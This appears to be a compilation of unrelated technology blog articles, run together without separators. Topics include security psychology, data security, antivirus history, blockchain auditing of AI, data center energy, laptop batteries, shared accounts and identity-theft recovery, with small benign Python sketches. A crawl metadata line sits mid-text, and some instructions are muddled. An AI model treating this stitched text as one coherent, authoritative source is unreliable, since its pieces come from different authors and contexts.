Overall, an AI-powered WEBINT platform functions as a Swiss army knife when it comes to cyber attribution, utilizing:
• Natural Language Processing (NLP) algorithms for AI text and entity analyses in minutes.
• AI Sentiment Analysis, which enables analysts and investigators to determine potential cyberattacks by gaining insights into the sentiment of each instance and communication.
• Structuring Big Data, which consists of the transformation of unstructured data into structured data that can easily be sorted through.
• AI Image Analysis, which provides analysts and investigators with image recognition and automatic image detection to keep track of threat actors and get alerted when a relevant image reappears.
• Trends Search, consisting of the analysis of geo-trending hashtags and keywords to assist analysts and investigators to follow trends and receive relevant information.
• Machine Learning algorithms to improve AI capabilities in terms of text analysis and face recognition, providing analysts and investigators with faster and more reliable results.
Last but not least, the platform can trigger real-time alerts regarding certain malicious activities, individual threat actors, and their social and business networks to prevent cyberattacks and related activities.
It is a quirk of human nature that we have a hard time contemplating abstract notions of danger, especially when it is introduced to us by others. In the simplest of examples, imagine a sign, placed next to a surface, that reads “Wet Paint.” Out of 100 people, how many do you think will touch the surface to see if it is indeed wet? The answer is always more than 50%.
This condition has a name, unsurprisingly called “Wet Paint Syndrome.” It springs from the idea that, when confronted with a situation demanding compliance, there will always be a proportion of a population that will reject the instruction, for one of a few reasons:
- Belligerence – the refusal to be told what to do, resulting in a directly opposite reaction: You tell me not to touch the paint, so I will touch it.
- Individual disbelief – the sign might be old, and the paint might already be dry, so I will check it myself.
- Collective disbelief – I saw that person touch it, so I am going to touch it.
- Cultural disbelief – the sign is fake news.
- Ignorance – I read the sign, but the warning did not register with me as something I should pay attention to.
- Reflex – I read the sign and, without thinking, touched the paint anyway.
Humans are guided in part by instinct and reflex. If we cannot perceive danger through our physical senses, then we cannot process it accurately. A poisonous snake, spoiled milk, the smell of smoke or the image of a pool of human blood – these are stimuli that make most people recoil. These forms of danger are accepted as real.
Cybersecurity: The Invisible Threat
When it comes to cyberhygiene activities, the threat we seek to avert seems, to many end users, to be invisible or inconsequential. It won’t be until the actual moment when a computer screen freezes and reveals a ransomware notice that the dangers of lax security become real.
People are suffering from alert fatigue. They have grown tired of repeated requests to update their passwords, and so they simply modify one digit, upgrading from “Mary123” to “Mary124”.
But here’s the kicker. When offered the opportunity to use a solution to these tedious chores, such as a password manager, people recoil even further. A password manager is an app that generates passwords out of random character strings such as 86vPH*r1en@2@4FH. These are extremely difficult and time-consuming for hackers to guess but are equally difficult for people to memorize. But when it is explained that they do not have to memorize them at all, and that the password manager simply fills them in when needed, people push back. The comfort they feel in being able to remember their passwords exceeds that of having infinitely more secure passwords they can’t memorize.
Any security specialist who has tried to explain password managers will have experienced this sort of pushback. They will likely have stopped short of trying to explain exactly how password managers encrypt passwords at a device level using a salted hashing technique where none of the components, including the master password, actually are stored by the password manager itself. This is a type of dark magic that makes most peoples’ eyes glaze over.
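As a rough sketch of those two ideas — random password generation and salted key derivation — here is a minimal example using only Python’s standard library. Real password managers layer much more on top of this (vault encryption, tuned key-stretching parameters, secure storage), so treat it as an illustration of the principle rather than a blueprint of any particular product.

import hashlib
import secrets
import string

def generate_password(length=16):
    # Generate a random password along the lines of 86vPH*r1en@2@4FH.
    alphabet = string.ascii_letters + string.digits + "!@#$%*"
    return "".join(secrets.choice(alphabet) for _ in range(length))

def derive_vault_key(master_password, salt=None):
    # Derive an encryption key from the master password with a salted,
    # deliberately slow hash (PBKDF2). Neither the master password nor
    # the derived key needs to be stored -- only the random salt is kept.
    salt = salt or secrets.token_bytes(16)
    key = hashlib.pbkdf2_hmac("sha256", master_password.encode(), salt, 600_000)
    return key, salt

password = generate_password()
key, salt = derive_vault_key("correct horse battery staple")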
Cybersecurity Expertise Includes Some Psychology
The point is that people in general cannot sit comfortably with change because change means confronting the unknown. Cybersecurity specialists must realize just how fragile the human instinct is when they frame arguments around safety and security protocols. Sometimes it all comes down to change resistance when they hear comments like “how can I trust a password that I can’t memorize,” or “back in my day we never needed Two Factor Authentication, so I’m not using it now.”
Just like a rapidly spreading virus, all it takes is one person to make that initial contact with an infected email link to penetrate the defenses of an organization and the organizations it is connected to.
A cybersecurity specialist’s portfolio of skills must include some psychology, which can be transformed into empathy, change management and communication skills. Although a central pillar of the job is to be proactive, success in the security field will not be complete until we recognize just how incompatible the concept of proactivity is with the day-to-day priorities of end users and frame our communication strategies around this.
For more information, read the Proactive Cybersecurity Beyond COVID-19 white paper.
By Steve Prentice
Steve Prentice is a project manager, writer, speaker and expert on productivity in the workplace, specifically the juncture where people and technology intersect. He is a senior writer for CloudTweaks.
All over the globe, the data generated daily is estimated at millions of terabytes. Notably, most of this data consists of reports and logs, which means that not all of it is equally valuable.
Data security is mostly useful to individual users for the diagnosis and analysis of important information.
A lot of information can hide among the accumulated daily data, including personal data that may reveal sensitive details about a person, highly classified business information, and transaction details that can allow cyber offenders to withdraw another person's cash seamlessly. Here is an ultimate guide to protecting your data.
What is Data security?
Data security is a set of best practices carried out by data users to protect their information saved in the cloud from illegal access, exposure, modification, accidental loss, corruption, or manipulation across the data's complete life cycle, from the creation of the data to its destruction.
Data security is an important factor in maintaining the integrity, confidentiality, and availability of business data. Integrity refers to making sure that the information is accurate and complete. Confidentiality means the data is kept private, and availability means access can be given to authorized data owners only. Cybercriminals can try several means to get this data, which is why the authorized data owner must try everything to thwart their efforts.
Since data security rests on the triad of confidentiality, integrity, and availability, these principles are collectively known as the CIA triad. If one or all of these are compromised by cybercriminals, a business can suffer monetary and reputational damage.
Therefore, data security measures are designed around the CIA triad. The measures must include a range of controls, policies, procedures, and technologies that safeguard the information created, received, obtained, transmitted, and stored by the business organization.
Why is Data Security Important?
Data security is necessary for business owners no matter the size of the business. It is also important for individuals who use computers at home. Sensitive data including account details, client details, personal files, bank information, and more, must be secured because if it is disclosed to unauthorized individuals, it can be abused or used unlawfully to hurt the data owner.
With data security, such useful information can be retrieved and protected. Here is why cyber security is important:
To Protect Your Integrity
Once your sensitive information gets into the wrong hands, it impacts your reputation negatively. The business that you have worked hard to build all these years can suddenly suffer due to a breach in your information.
This can be worrisome because several businesses obtain confidential data of clients or customers and these individuals trust the business owners to protect their data. The moment this information is leaked or lost to unknown sources, the business owner will face a lot of pressure from a host of customers or clients.
High Rates of Cyberthreats
Cyber threats are persistently occurring these days, which is why data security is important. If you operate any business without considering cyber threats, then you must be ready to face attacks that can ruin your business. Aside from business enterprises, home computer users can also be at risk of attack because of the rise of technologies including the Internet, mobile devices, cloud computing, and more.
It is Complex and Expensive to Fix Data Damage
After data is exposed to the wrong hands, affected individuals can recover, quickly or gradually, from the impact on their reputation. However, the same may not be true for the data that has been breached. Some of this information is never recovered, while some is difficult and expensive to fix.
How Does Data Security Help Businesses?
It Prevents Data Compromise
The topmost reason for securing data is to keep it from falling into unauthorized hands. Well-secured data cannot be compromised easily by unknown sources. In addition, when you use data security to prevent exposure and leakage of personal data, you will not face data breaches and you will not lose money to cyber thieves.
It Safeguards Privacy
Most information is strictly business-related, while other information is valuable personal data that should be kept private. By protecting your information, your privacy will also be safeguarded.
It Reduces Compliance Costs
Data security is important because it helps to reduce compliance costs by centralizing and automating controls. It also makes independent review procedures easier.
It Ensures Data Integrity
Data security helps protect data, file configurations, and data structures against illegal alteration.
What Are the Useful Data Security Rules?
Train Employees to Identify Threats
Once you train your employees to identify threats and protect themselves against these threats, they will no longer be vulnerable to attacks. Usually, your team of staff is most likely to be attacked by cybercriminals since they are perceived as weak and easy to manipulate.
Cybercriminals can target employees and steal sensitive information about the company through phishing, a strategy they use to infiltrate IT infrastructure. To avoid such attacks, companies must provide quality training to employees to help them identify the different tactics used by cyber attackers and stay alert to frustrate their efforts.
Improve Compliance Efforts With Data Classification
Data classification is a great way to tag data into different categories after identifying it. While doing this, ensure that you create categories based on the importance of the information, such as content, file type, or privacy compliance.
If you use this process to save your information, your company's information will be compliant and secure. You will also gain better visibility into where sensitive data is stored.
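As a simple sketch of automated classification, the example below tags a piece of text by scanning for patterns that suggest sensitive content. The patterns and category names here are invented for illustration; real classification tools use far richer rule sets and machine learning.

import re

SENSITIVE_PATTERNS = {
    "email_address": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "card_number": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
    "national_id": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}

def classify(text):
    # Tag text as 'restricted' if any sensitive pattern matches.
    hits = [name for name, rx in SENSITIVE_PATTERNS.items() if rx.search(text)]
    return ("restricted", hits) if hits else ("public", [])

print(classify("Invoice for jane@example.com, card 4111 1111 1111 1111"))
# ('restricted', ['email_address', 'card_number'])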
Treat Data Security Problems Seriously
Taking data security seriously prepares you against problems with your business network. Data security should involve more than changing your password regularly. It should be comprehensive and treated strategically as a part of your business.
Developing a response plan before you are surprised by a cyber attack is very necessary. Follow the best measures to prevent data compromise and even though your efforts may not guarantee you complete safety from cyber criminals, you can do a lot to protect your business and information from them.
Alfonso XI, ‘the Avenger’, was a Spanish king who once described in awe how during a battle against the Marinids, they hurled many iron balls with thunder and the Christians were deeply afraid, as any man’s limb that was hit was sliced off as if with a knife. He was describing the impact of gunpowder on his troops. Soldiers, for whom in 14th century a battle meant swords, shields and arrows, were suddenly confronted with a new weapon that rendered their ‘security technology’ utterly useless.
It was a similar story when the Mark I tank entered into action in the battle of the Somme in 1916. The trench defenses prepared to repel soldiers offered scant resistance, and the bullets from soldiers’ rifles just bounced off the tank’s metal shell. Once again, there was no technology available to confront the new threat.
And away from the theatre of war, human beings have faced many situations in which our concept of security has had to adapt: What use were the handkerchiefs people wore around their faces to keep Spanish flu at bay in 1918? None whatsoever: the virus causing the flu was so small that no handkerchief could filter it out. Special filters had to be developed to protect against airborne viruses.
And today we also face similar problems with security systems, in this case, IT security. In the early days of personal computing, the emergence of viruses exposed users to a new threat for which they were ill-prepared. Existing technology was of no use and programs had to be developed to stop viruses: antivirus programs.
Soon, however, more advanced protection was needed. There were more and more viruses, and security laboratories were hard-pushed to generate all the necessary vaccines. In the war being waged, the quality of the malware was practically irrelevant; the strategy was to saturate the antivirus developers. Whereas previously just a couple of dozen viruses a day were detected, now hundreds if not thousands were appearing.
Proactive detection technologies, designed to root out new malicious code, fulfill their purpose, but once again new weapons are being used that can breach even proactive defenses (and even these are only developed by a select few security companies).
Many businesses (and also home computers) have seen an upsurge in targeted attacks by hackers. Software using special stealth techniques (e.g. rootkits), unique creations targeted at a single computer with vital information… these are the new weapons. The ‘business opportunities’ of having, say, a Trojan spying on competitors are such that hackers are now renouncing the lure of personal notoriety in favor of cash rewards.
While these attacks surreptitiously harvest confidential information, new examples of malware still pour into security laboratories. It's just like a scene from an epic war film: hundreds or thousands of soldiers charge into action, sacrificed for the cause, while on a distant hilltop the general watches as the special forces secretly penetrate enemy lines.
The technology needs to be reinvented. The reactive technologies of the classic resident antivirus are simply not enough. The panorama has changed, and the protection strategy must also change. Outdated technologies are about as useful as a mediaeval shield against an assault rifle. Today, in the time it takes a lab technician to start up a computer to investigate a malicious code, an infection can spread massively. The record-holder in this field is SQLSlammer, which some sources claim took just 15 seconds.
To establish a protection system against new threats, we need to set up an intelligent layer of protection in every system connected to the Internet, be it a corporate workstation or a home PC. This means a system that can analyze what is happening on a computer and detect dangerous behavior, stopping it before it is too late.
This type of technology for detecting unknown threats (and I'm not speaking about classic heuristics systems, but intelligent technologies) is readily available from some manufacturers of consumer security solutions. But where is the protection for corporate networks? Why should administrators with hundreds or thousands of computers have to go without protection against unknown threats?
By Steve Todd
In a proactive move to “eliminate a future conflict,” Elon Musk recently stepped down as chairman of OpenAI, a nonprofit research company he cofounded two years ago aimed at building safe artificial intelligence (AI) with wide benefits for all. In 2014, Musk suggested AI could be “more dangerous than nuclear weapons,” a statement he reiterated at a recent SXSW event in Austin, TX.
Bill Gates also went on record several years ago about his concerns regarding machine superintelligence. The two technology leaders joined others in creating an open letter encouraging research into AI safeguards:
“It is important to research how to reap [AI] benefits while avoiding potential pitfalls.”
The open letter was accompanied by a research priorities proposal, highlighting work that can be done to make AI “robust and beneficial.”
Perhaps the most pressing question today is whether we can use current technologies — such as historical and preventative tracking — to build AI safeguards that not only figure out why an AI algorithm made a poor decision but also preclude other AI algorithms from making the same poor decision?
I believe the answer to that question is yes. Two existing technologies can come together to provide the ability to audit the decisions machines are making: a) Blockchain technology and b) any off-chain storage systems that are referenced by Blockchain. Together, they can form the foundation of a digital forensics platform that can be extended to monitor (and potentially regulate) super-intelligent decision-making.
Blockchain, introduced with Bitcoin in 2009, can be thought of as a tamper-proof ledger of transactions, though ledger entries do not have to necessarily contain records of financial transfers. Each blockchain transaction is time-stamped and can reference any type of “off-chain” data records that live in well-protected and secure storage systems. References to the data are implemented via very small character strings that can be easily stored within the ledger.
Off-chain storage technology is especially powerful when implemented by a special class of storage systems known as content-addressable storage (CAS); the first CAS system, Centera, was initially shipped in 2003. This type of storage system assigns unique digital fingerprints to every piece of digital content. Once stored, the data cannot be tampered with or deleted and can be retrieved based on content, not storage location.
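The content-addressing idea can be sketched in a few lines of Python: every object is stored under a digital fingerprint derived from its content, so any tampering changes the address and is immediately detectable. The toy dictionary below stands in for a real storage system, and SHA-256 stands in for whatever fingerprinting scheme a given product actually uses.

import hashlib

class ContentAddressableStore:
    # Toy content-addressable store: objects are keyed by their
    # content fingerprint, not by a location or filename.
    def __init__(self):
        self._objects = {}

    def put(self, data):
        fingerprint = hashlib.sha256(data).hexdigest()
        self._objects[fingerprint] = data
        return fingerprint  # a small string suitable for an on-chain reference

    def get(self, fingerprint):
        data = self._objects[fingerprint]
        # Integrity check: tampered content no longer matches its address.
        assert hashlib.sha256(data).hexdigest() == fingerprint
        return data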
The power of these two technologies is already on display as a solution for the medical industry. In “How to Achieve Data Privacy in Blockchain Ledgers,” Dr. Marten Neubauer details how the solution allows a medical record to be stored in an off-chain storage system. The record is assigned a unique identifier and the asset is then registered on a Blockchain system. When any doctor looks at (or tries to access) a patient record, it’s possible to also record that attempt on the blockchain, so a patient can track which doctor is looking at a particular private data record.
It’s easy to imagine how this solution could be applied to AI. Consider a use case in which an AI algorithm makes decisions in the context of a self-driving car. An AI vendor, for example, could store a new algorithm in an off-chain storage location. They could then “register” their algorithm as a blockchain transaction. The registration entry can require a vendor’s unique key, creating a digital signature that establishes ownership of their algorithm.
In this scenario, a connected car can then see this registered algorithm and download the software. As new data continually arrives to the car, this data can undergo a similar registration prior to analysis. The algorithm, the input data, and any output data, can all be stored off-chain and registered on-chain. This provides a chain of ownership in terms of which algorithms have analyzed particular data sets. If an accident should occur based on AI decisions, the blockchain provides a trustworthy record of how the decision was made.
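A toy version of that registration flow might look like the following Python sketch. The ledger here is just an append-only list, the HMAC stands in for a vendor's digital signature (a real blockchain would use asymmetric keys so anyone can verify ownership), and all names and values are hypothetical:

```python
import hashlib, hmac, json, time

ledger = []  # stand-in for a blockchain: an append-only list of entries

def register(artifact: bytes, owner: str, owner_key: bytes) -> dict:
    entry = {
        "owner": owner,
        "artifact": hashlib.sha256(artifact).hexdigest(),  # off-chain data, by hash
        "timestamp": time.time(),
        "prev": ledger[-1]["entry_hash"] if ledger else None,  # chain linkage
    }
    payload = json.dumps(entry, sort_keys=True).encode()
    # HMAC stands in for the vendor's digital signature here.
    entry["signature"] = hmac.new(owner_key, payload, "sha256").hexdigest()
    entry["entry_hash"] = hashlib.sha256(payload).hexdigest()
    ledger.append(entry)
    return entry

algorithm = b"def decide(sensor_data): ..."  # the AI model/code, stored off-chain
register(algorithm, owner="acme-av", owner_key=b"vendor-secret")
register(b"lidar frame 0x1f", owner="car-977", owner_key=b"car-secret")
print(json.dumps(ledger, indent=2))
```

Because each entry references the previous one and carries a signature, the resulting record establishes a time-stamped chain of ownership over both the algorithm and the data it analyzed.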
This type of system will be critical to perform forensics on situations in which self-driving cars malfunction, perhaps crash, or cause damage and even loss of life. Just last week the first death in the self-driving car experiment occurred in Arizona. It is a tragic instance of the kinds of risks articulated by technology luminaries like Musk and Gates. If today's simple AI algorithms can make mistakes that result in loss of life, what kind of mistakes will super-intelligent algorithms make?
Fortunately, Blockchain and off-chain digital forensics systems can provide time-stamped and immutable proof of why AI algorithms make their decisions. This offers a regulatory opportunity for holding companies responsible for ethical and reasonable use of AI technology. Not only can this technology conduct forensics on poor decisions, but it can also use the forensics data to train new models to avoid those poor decisions. An off-chain digital forensics platform can therefore be augmented to attack the problem of AI algorithms overextending their intelligence into areas in which they should not be participating.
Once these safeguards are put in place, regulated AI algorithms can then focus on bringing maximum benefit with minimal harm. Everyday examples of the benefits AI can bring include:
- Better fuel consumption and reduced carbon footprint
- Better student education
- Fraud reduction and prevention
- Safer social media
- Smarter personal assistants
While there are certainly obstacles to implementing this type of system (e.g., the network latency required to connect thousands of cars to a blockchain), a lack of research is not one, and the solution outlined is clearly within the realm of the possible.
In a recent study commissioned by Dell Technologies and conducted by the Institute for the Future, we are reminded that AI technologies, “enabled by significant advances in software, will underpin the formation of new human-machine partnerships.” While the fears articulated by Musk and Gates are real, we should be encouraged that existing technologies can already go a long way toward mitigating those fears. Blockchain and off-chain storage platforms are “trust technologies;” they allow us to trust the integrity of data across all AI connection points.
There are tremendous benefits to the adoption of AI in healthcare, in industry, in transportation and more. When measures are taken to deploy these two trusted technologies properly, the benefits to our world far outweigh the risks.
Steve Todd is a software engineer and inventor for Dell EMC with more than 170 patents granted by the USPTO. He earned bachelor's and master's degrees in Computer Science from the University of New Hampshire. His inventions have generated tens of billions of dollars in revenue for Dell EMC. Steve is a Dell EMC Fellow and currently serves as the Vice President of Strategy and Innovation in the Office of the CTO, with a research emphasis on multi-cloud solutions, data value, and Blockchain.
Future of Grid Greening
As renewable and low-carbon energy becomes more prevalent, the sustainability of the electrical grid is improving over time. Our focus is on the continuing improvement of the grid’s greenhouse gas intensity and water intensity. Understanding these trends means that we need to build our data centers for the grid of tomorrow, rather than that of yesterday.
The ongoing improvement in grid carbon intensity means we should avoid building data centers that rely on combustion for primary operation (such as natural gas-fired heaters and chillers). Even if there are some savings today, our data centers are built to last. Electrical heating and cooling will serve us well into the future, allowing us to take advantage of the greening grid.
The generation of electricity for the grid using thermoelectric power plants (such as natural gas, oil, coal, and nuclear plants) consumes water. However, newer thermoelectric plants consume less water, and most renewable technologies consume none. With water consumption in electricity generation falling over time, we should avoid building data centers today that rely on evaporating water for cooling. Even if current water-cooling technology yields a net water saving in some regions compared with the water used in grid generation, locking our cooling infrastructure into a dependence on large amounts of water means we cannot take advantage of these future grid improvements, leading to higher water use in the long run.
Even with market-based carbon reduction instruments like RECs and VPPAs, the location-based emission factor of the grid is still an important aspect of greenhouse gas inventories. As a Strategic Partner, we provide the carbon intensity of each of our data centers to give our customers the information they need to choose locations that help meet their sustainability goals.
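As a rough illustration of location-based accounting, emissions are simply energy consumed multiplied by the grid's emission factor at that location. The factors and load in this Python sketch are made-up placeholders, not real regional data:

```python
# Location-based accounting: emissions = energy used x grid emission factor.
grid_factor_kg_per_kwh = {"region_a": 0.45, "region_b": 0.12}  # illustrative only

annual_kwh = 50_000_000  # hypothetical data center load
for region, factor in grid_factor_kg_per_kwh.items():
    tonnes = annual_kwh * factor / 1000  # kg -> metric tonnes
    print(f"{region}: {tonnes:,.0f} t CO2e per year")
```

The same arithmetic applies to water intensity, substituting liters of water per kWh for grams of CO2e.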
The age of mobile technology is truly amazing. We can move from pillar to post as much as we please and still stay connected. However, we're not completely mobile, because we're still chained to the nearest outlet by our chargers while we keep a constant eye on the pesky little battery gauge. While we won't ever truly be able to eliminate these things, there are a few ways to make your situation better. The first step is to know how to take care of your device's battery. And when it comes to your laptop, we know just the steps you need to make sure your battery is running up to speed.
Saving cycles will help save your battery
All laptop batteries are built to handle a certain number of charge cycles, which is the process of charging a rechargeable battery and discharging it as required into a load. The term is typically used to specify a battery’s expected life. Essentially, a charge cycle equals one full discharge down to zero percent and then a recharge back up to 100 percent. Likewise, a discharge down to 50 percent and then back up to 100 percent would be equal to half a cycle. In other words, the fewer times you drain the battery, the longer your device’s battery will last you.
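Because partial discharges add up fractionally, cycle wear can be estimated by summing depth of discharge. Here is a quick illustrative calculation in Python (the rated cycle count is a made-up figure; check your manufacturer's spec):

```python
# One "cycle" = 100% of capacity discharged in total, in any number of steps.
discharges = [0.50, 0.50, 0.30, 0.20, 1.00]  # fractions of capacity drained

cycles_used = sum(discharges)
print(f"Equivalent full cycles consumed: {cycles_used:.1f}")   # 2.5

rated_cycles = 500  # hypothetical rating for a laptop battery pack
print(f"Battery life used: {cycles_used / rated_cycles:.2%}")  # 0.50%
```

The takeaway: the shallower and less frequent your discharges, the more slowly you consume the battery's rated cycles.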
One of the best ways to do this is to switch your computer over to 'eco mode,' a common system preference found in your laptop's OS settings. This mode manages the way your device uses energy in an effort to conserve battery power. Other ways to save cycles include manually reducing the power you use by shutting off Wi-Fi, Bluetooth, and keyboard backlighting when you're not using them.
Another helpful function is managing your laptop's hibernation mode. Ideally, you want your laptop to enter hibernation before the battery is completely drained. Hibernation is a power state where everything in working memory is written to the hard drive or SSD and the laptop is then turned completely off. What makes hibernation different from the other sleep states available on most modern laptops is that it uses zero power, while the others use a minimal amount.
Additionally, it’s a good practice to quit any applications you have running in the background. These apps are what typically eat up your battery life. On a Windows computer, you can look at your System Tray, your Task Manager, and your Processes tab to see which of those icons really aren’t necessary. With macOS, you can see what apps are using the most power by clicking on the battery icon in the task-bar located in the upper right by opening the Activity Monitor and selecting the Energy section. Cloud storage services or video players that you aren’t using can be safely shut down.
Keeping your battery in the zone
A few decades back, when technology was less advanced, there was a common problem called "battery memory" that caused nickel-cadmium (NiCd) batteries to "forget" their full charge capacity and start charging at lower and lower levels, until there was hardly any capacity left. With the modern lithium-ion batteries we have today, however, this issue is pretty much non-existent.
And you’ve probably heard that it’s a good practice to ‘drain’ your laptop’s battery every now and then to keep your battery working the way that it should — almost as if you are reminding it of its battery capacity. However, contrary to this popular belief, you do not need to complete discharge a lithium-ion battery and then charge it back up to somehow reboot or recalibrate the battery. This is actually a destructive practice that is very hard on your battery. Generally, the consensus seems to be that letting your battery discharge (not completely, but down to around 20 percent or so) and then charge it when possible is a much better practice to follow.
Another common misconception is that keeping your devices plugged in as often as possible (i.e., overnight) is bad for your battery. The theory is that letting a battery sit at 100 percent charge could eventually wear it out more quickly. However, today's devices are designed to stop charging once they hit 100 percent, so keeping them plugged in hardly impacts the battery's lifespan.
Generally speaking, the best thing you can do for your lithium-ion battery is to avoid letting it discharge below 20 percent. Plug it in and charge it when you can, and then rinse and repeat. The good news is that with modern batteries and systems there’s really not much else you need to do — except perhaps reasonably expect that your battery will eventually start losing its overall capacity.
Don’t let your laptop overheat
Lithium-ion batteries may be more durable than their predecessors, but they are finicky devices that can only take so much temperature fluctuation. Both high and low temperatures can damage your laptop battery permanently or reduce its useful lifespan.
If your laptop ever begins to grow abnormally warm, perhaps because the CPU or graphics processor is working hard or the environment is overly hot, then be sure to shut the device down and if able, pop the battery out. Giving your device a break where it can cool down could save you the headache of having to purchase a new battery.
In all, you'll want to give your laptop some good old TLC. On top of configuring your settings to manage your device's battery, you should also keep up with some maintenance by cleaning out any dust and debris that may be clogging the cooling vents. Make sure that the contact points are especially clean. And of course, keep your laptop's software up to date! Companies continuously work to improve the way programs use power via software updates.
Shared accounts are a method of giving multiple users access to corporate resources and services by having each of them authenticate with a single set of credentials. Shared accounts can be linked to role-based emails, servers, cloud platforms, services or databases.
A security downside to using shared accounts across multiple users is that they lack the visibility, certainty, and accuracy about a particular session that singly-owned accounts provide. This contradicts the main reason for authentication, which is to answer the question "Am I who I say I am?" when access is requested. Shared accounts also rely on Single Factor Authentication (SFA), since hard and soft tokens cannot be managed among groups of users.
Going further, if the credentials of a shared account are deliberately or inadvertently shared with users outside the known circle, the problem is amplified. The account log provides no visibility into this more serious failure to properly attribute a session.
Some services, email for example, provide no alternative to relying on a single pair of credentials. They are designed to be tied to just one person, so for a team there is no option but to adopt a shared account practice.
"Shared accounts such as role-based emails, for example 'hello at x dot com', are notorious for SFA-associated security risks. Not only do many other unauthorized users hold these credentials, but without these credentials more tightly tied to a user through hard or soft token MFA, it's just a wild west of risk and opacity for the enterprise that owns the underlying service ." | <urn:uuid:cea1ac2d-3125-4789-bed9-7f245d23df31> | CC-MAIN-2022-40 | https://www.hypr.com/security-encyclopedia/shared-accounts | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00586.warc.gz | en | 0.94127 | 317 | 2.6875 | 3 |
We live online these days, sharing everything from vacation pictures to what we eat for breakfast on the internet. The internet is also useful for daily activities, like buying groceries or paying bills.
While it's convenient to connect with people and complete tasks online, cybercriminals are eager to use the internet to steal financial or personal data for their own gain, a crime known as identity theft. Identity theft can negatively affect your credit score and cost money to fix. It can also affect employment opportunities, since some employers run a credit check on top of drug testing and a criminal history check. Identity theft victims may even see an impact on their mental health as they work to resolve their case.
The good news is that being able to recognize the signs of identity theft means you can act quickly to intervene and minimize any effects in case it happens to you. You can also protect yourself by using preventive measures and engaging in smart online behavior. This article provides essential information about identity theft, giving you the tools you need to become an empowered internet user and live your best life online.
5 steps to take if your identity has been stolen
The internet is a great place to be, but identity thieves hope to catch you off-guard and seek access to your personal information for their benefit. This could include private details like your birth date, bank account information, Social Security number, home address, and more. With data like this, an individual can adopt your identity (or even create a fake identity using pieces of your personal profile) and apply for loans, credit cards, debit cards, and more.
You don’t have to be kept in the dark, though. There are several signs that your identity has been stolen, from a change in your credit score to receiving unfamiliar bills and debt collectors calling about unfamiliar new accounts. If you suspect that you’ve been affected by identity fraud, you can act fast to minimize what happens. Here’s what to do.
File a police report
Start by contacting law enforcement to file a report. Your local police department can issue a formal report, which you may need to get your bank or other financial institution to reverse fraudulent charges. An official report assures the bank that you have been affected by identity fraud and it’s not a scam.
Before going to the police, gather all the relevant information about what happened. This could include the dates and times of fraudulent activity and any account numbers affected. Bringing copies of your bank statements can be useful. Also, make note of any suspicious activity that could be related. For example, was your debit card recently lost or your email hacked? The police will want to know.
Notify the company where the fraud occurred
You should also notify any businesses linked to your identity theft case. Depending on the type of identity theft, this could include banks, credit card companies, medical offices, health insurers, e-commerce stores, and more. For example, if someone used your credit card to make purchases on Amazon, alert the retailer.
Medical identity theft is another good example. In this case, a fraudster may assume your identity to gain access to health care services, such as medical checkups, prescription drugs, or pricey medical devices like wheelchairs. If someone uses your health insurance to get prescription drugs from a pharmacy, for instance, make sure to alert the pharmacy and your insurer.
File a report with the Federal Trade Commission
The Federal Trade Commission (FTC) is a government body that protects consumer interests. You can report identity theft via their portal, IdentityTheft.gov. They’ll then use the details you provide to create a free recovery plan you can use to address the effects of identity theft, like contacting the major credit bureaus or alerting the Internal Revenue Service (IRS) fraud department. You can report your case online or by calling 1-877-438-4338.
Ask credit reporting agencies to issue a fraud alert
A common consequence of identity theft is a dip in the victim’s credit score. For example, a cybercriminal may take out new lines of credit in the victim’s name, accrue credit card debt, and then not pay the balance. For this reason, contacting the credit monitoring bureaus is one of the most important steps to take in identity theft cases.
There are three main agencies: TransUnion, Equifax, and Experian. You can get a free credit report from each agency every 12 months via AnnualCreditReport.com. Check the report and note all fraudulent activity or false information and flag it with the relevant bureau’s fraud department. You should also initiate a fraud alert with each agency.
A fraud alert requires any creditors to verify your identity before opening a new line of credit. This adds an extra layer of security. An initial fraud alert lasts for 90 days. Once this expires, you can prolong your protection via an extended fraud alert, which will remain valid for seven years. You can notify one of the big three bureaus to set it up. They are then required to notify the other two bureaus.
A credit freeze is another smart move, which you can do through each of the three major credit bureaus. You can either call them or start the process online. This prevents people from accessing your credit report. Lenders, creditors, retailers, landlords, and others may want to see your credit as proof of financial stability. For example, if someone tries to open a phone contract under your name, the retailer may check the credit report. If there is a credit freeze in place, they won’t be able to view it and won’t issue the contract. If you need to allow someone access to your credit report, you can temporarily lift the freeze.
Change passwords to all of your accounts
Identity theft is often linked with leaked or hacked passwords. Even if you aren’t sure whether your passwords have been compromised, it’s best to play it safe. Change passwords to any affected accounts. Make sure to use strong passwords with a mix of numbers, letters, and symbols. Further, if there’s a chance to activate two-factor authentication on your accounts, this can provide added protection going forward.
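If you would rather not invent new passwords by hand, a few lines of code can do it. Here is an illustrative Python sketch using the standard secrets module, which is designed for cryptographic randomness (a password manager will do the same job with less effort):

```python
import secrets
import string

def generate_password(length: int = 16) -> str:
    """Generate a random password mixing letters, digits, and symbols."""
    alphabet = string.ascii_letters + string.digits + "!@#$%^&*-_"
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())  # e.g. 'r7!Kq_2Lx@9ZmVb4'
```

Generate a different password for each account and store them in a password manager rather than reusing any of them.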
Is it possible to prevent identity theft?
Ideally, you’ll never become the victim of identity theft, but things can happen. Cybercriminals work hard, but you can stay one step ahead by taking a few preventative measures. These include:
- Learn how to recognize common scams. ID theft comes in many forms, from email phishing scams to social media snooping, device hacking, and data breaches. Learn the signs of a scam. For example, phishing emails are often poorly written and frequently follow certain formats, like claiming that an account of yours has been suspended.
- Activate fraud alerts. Most financial institutions provide alerts about suspected fraudulent transactions, sending you a notification via phone call, text, or email if they notice suspicious activity on your account. The bank may also freeze an account automatically until any potentially unauthorized charges are clarified and confirmed by the account owner.
- Protect your devices with strong passwords. Your devices, including your phone, tablet, and laptop, should all be password-protected. In case one of your tech tools is stolen, it will be harder for fraudsters to gain access to your personal data. Set strong passwords with a mix of letters, numbers, and symbols. Make sure they don’t include information a person could figure out easily, like your home address or birthday.
- Use different passwords for different accounts. Any online accounts you use, from your banking app to your email, should be password-protected. Follow the same rules for setting strong passwords, but don’t duplicate passwords. If a hacker cracks the code for one account, they can easily guess their way into your other accounts. A password manager can help you stay on top of your passwords by encrypting them and storing them safely for easy tracking. McAfee Identity Protection includes a password manager that can secure your account credentials across devices.
